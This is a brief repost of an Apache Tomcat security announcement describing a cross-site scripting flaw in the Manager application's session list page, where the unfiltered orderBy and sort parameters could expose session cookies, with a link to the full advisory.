This was announced yesterday afternoon by the Apache Tomcat team:
The session list screen (provided by sessionList.jsp) in affected
versions uses the orderBy and sort request parameters without applying
filtering and therefore is vulnerable to a cross-site scripting attack.
Users should be aware that Tomcat 6 does not use httpOnly for session
cookies by default so this vulnerability could expose session cookies
from the manager application to an attacker.
A review of the Manager application by the Apache Tomcat security team
identified additional XSS vulnerabilities if the web applications
deployed were not trusted.
The full announcement is available at TomcatExpert.com: http://www.tomcatexpert.com/blog/2010/11/22/apache-tomcat-manager-application-xss-vulnerability